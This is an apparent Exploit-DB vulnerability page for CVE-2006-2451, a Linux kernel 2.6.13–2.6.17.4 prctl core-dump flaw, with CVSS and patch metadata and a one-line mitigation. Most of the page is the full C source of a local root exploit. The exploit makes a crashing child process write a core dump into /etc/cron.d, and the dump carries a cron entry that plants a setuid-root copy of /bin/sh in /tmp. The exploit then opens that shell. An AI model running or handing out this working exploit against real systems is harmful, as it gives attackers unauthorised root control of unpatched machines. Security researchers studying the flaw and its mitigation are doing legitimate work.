Linux Kernel PRCTL Core Dump Handling

vendor:

Linux Kernel

by:

dreyer & RoMaNSoFt

7,2

CVSS

HIGH

Local r00t Exploit

CWE

Product Name: Linux Kernel

Affected Version From: 2.6.13

Affected Version To: 2.6.17.4

Patch Exists: YES

Related CWE: CVE-2006-2451

CPE: o:linux:linux_kernel

Metasploit: https://www.rapid7.com/db/vulnerabilities/linuxrpm-CESA-2006-0574/, https://www.rapid7.com/db/vulnerabilities/linuxrpm-RHSA-2006-0574/, https://www.rapid7.com/db/vulnerabilities/suse-cve-2006-2451/

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Linux

2006

Linux Kernel PRCTL Core Dump Handling

This exploit is for Linux Kernel PRCTL Core Dump Handling vulnerability (BID 18874 / CVE-2006-2451) in Kernel 2.6.x versions (>= 2.6.13 && < 2.6.17.4). It creates a Cron entry and runs a shell with root privileges.

Mitigation:

Upgrade to the latest version of Linux Kernel 2.6.x

Source

Exploit-DB raw data:

/*****************************************************/
/* Local r00t Exploit for:                           */
/* Linux Kernel PRCTL Core Dump Handling             */
/* ( BID 18874 / CVE-2006-2451 )                     */
/* Kernel 2.6.x  (>= 2.6.13 && < 2.6.17.4)           */
/* By:                                               */
/* - dreyer    <luna@aditel.org>   (main PoC code)   */
/* - RoMaNSoFt <roman@rs-labs.com> (local root code) */
/*                                  [ 10.Jul.2006 ]  */
/*****************************************************/

#include <stdio.h>
#include <sys/time.h>
#include <sys/resource.h>
#include <unistd.h>
#include <linux/prctl.h>
#include <stdlib.h>
#include <sys/types.h>
#include <signal.h>

char *payload="\nSHELL=/bin/sh\nPATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin\n* * * * *   root   cp /bin/sh /tmp/sh ; chown root /tmp/sh ; chmod 4755 /tmp/sh ; rm -f /etc/cron.d/core\n";

int main() { 
    int child;
    struct rlimit corelimit;
    printf("Linux Kernel 2.6.x PRCTL Core Dump Handling - Local r00t\n");
    printf("By: dreyer & RoMaNSoFt\n");
    printf("[ 10.Jul.2006 ]\n\n");

    corelimit.rlim_cur = RLIM_INFINITY;
    corelimit.rlim_max = RLIM_INFINITY;
    setrlimit(RLIMIT_CORE, &corelimit);

    printf("[*] Creating Cron entry\n");

    if ( !( child = fork() )) {
        chdir("/etc/cron.d");
        prctl(PR_SET_DUMPABLE, 2);
        sleep(200);
        exit(1);
    }

    kill(child, SIGSEGV);

    printf("[*] Sleeping for aprox. one minute (** please wait **)\n");
    sleep(62);

    printf("[*] Running shell (remember to remove /tmp/sh when finished) ...\n");
    system("/tmp/sh -i");
}

// milw0rm.com [2006-07-11]